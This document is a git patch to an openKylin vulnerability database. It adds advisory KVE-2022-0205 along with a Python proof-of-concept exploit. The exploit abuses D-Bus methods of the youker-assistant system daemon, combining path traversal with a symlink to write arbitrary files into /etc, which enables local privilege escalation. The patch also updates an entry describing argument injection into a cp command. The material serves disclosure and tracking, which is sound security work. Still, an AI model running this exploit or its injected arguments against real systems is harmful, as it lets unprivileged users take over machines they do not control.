From 41449b3aea9aeac45113b1e032f2ddb50bb51eb8 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Fri, 21 Oct 2022 10:17:12 +0800 Subject: [PATCH] ADD KVE-2022-0205 --- .../2022/yaml/KVE-2022-0210.yaml | 2 +- .../2022/KVE-2022-0205/poc.py | 40 +++++++++++++++++++ .../2022/yaml/KVE-2022-0205.yaml | 19 +++++++++ vulnerability_list.yaml | 6 ++- 4 files changed, 64 insertions(+), 3 deletions(-) create mode 100644 kve/youker-assistant/2022/KVE-2022-0205/poc.py create mode 100644 kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml index 60a558db..df9264e5 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml @@ -2,7 +2,7 @@ id: KVE-2022-0210 source: openKylin Community info: name: 源管理服务的setMainSource接口任意文件写入漏洞。 - severity: critical + severity: high description: | com.kylin.software.properties.interface.setMainSource接口存在任意文件写入漏洞。实现方法是调用命令"cp file /etc/apt/sources.list"。但如果传递的参数为"['-t /etc /path/to/evil.txt'],由于开发者在实现时会将这个字符串按空格进行分割,并作为参数传递到cp命令,因此就会触发命令 "cp -t /etc /path/to/evil.txt /etc/apt/sources.list",从而实现任意文件夹的任意文件写入,导致权限提升。任意命令。 scope-of-influence: diff --git a/kve/youker-assistant/2022/KVE-2022-0205/poc.py b/kve/youker-assistant/2022/KVE-2022-0205/poc.py new file mode 100644 index 00000000..3bda459c --- /dev/null +++ b/kve/youker-assistant/2022/KVE-2022-0205/poc.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python3 + +import sys +import dbus +import os + +def run_cmd(cmd): + os.system(cmd) + +def copy_file(target_dir, src_file): + copy_cmd=f''' + srcDir=$(mktemp -d) + homeDir=/tmp/fakeroot/$srcDir + srcFile={src_file} + targetDir={target_dir} + gdbus call --system --dest com.kylin.assistant.systemdaemon \ + --object-path /com/kylin/assistant/systemdaemon \ + --method com.kylin.assistant.systemdaemon.set_homedir "$homeDir" + + # prepre src dir + mkdir -p $srcDir/stereo + cp $srcFile $srcDir/stereo + + # prepare target dir + mkdir -p $homeDir + mkdir -p $homeDir/.sounds.. + cd $homeDir + ln -s $targetDir stereo + + gdbus call --system --dest com.kylin.assistant.systemdaemon \ + --object-path /com/kylin/assistant/systemdaemon \ + --method com.kylin.assistant.systemdaemon.restore_all_sound_file "../../../..$srcDir" + + ''' + run_cmd(copy_cmd) + +os.system('touch restore_all_sound_file.txt') +copy_file("/etc", os.path.realpath("./restore_all_sound_file.txt")) +os.system('ls -l /etc/restore_all_sound_file.txt') +os.system('rm restore_all_sound_file.txt') \ No newline at end of file diff --git a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml new file mode 100644 index 00000000..0e9b92df --- /dev/null +++ b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml @@ -0,0 +1,19 @@ +id: KVE-2022-0205 +source: openKylin Community +info: + name: restore_all_sound_file方法任意写文件漏洞。 + severity: high + description: | + com.kylin.assistant.systemdaemon服务的restore_all_sound_file方法存在路径穿越,导致任意文件写入,导致权限提升。 + scope-of-influence: + youker-assistant< 3.0.2-0kylin6k64~rc2 + reference: + - + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: None + cwe-id: None + cnvd-id: None + kve-id: KVE-2022-0205 + tags: kve2022,dbus \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index 475177cc..2cdeb4ef 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -23,5 +23,7 @@ cve: - CVE-2021-4034 cnvd: kve: - kylin-software-properties - - KVE-2022-0210 \ No newline at end of file + kylin-software-properties: + - KVE-2022-0210 + youker-assistant: + - KVE-2022-0205 \ No newline at end of file -- Gitee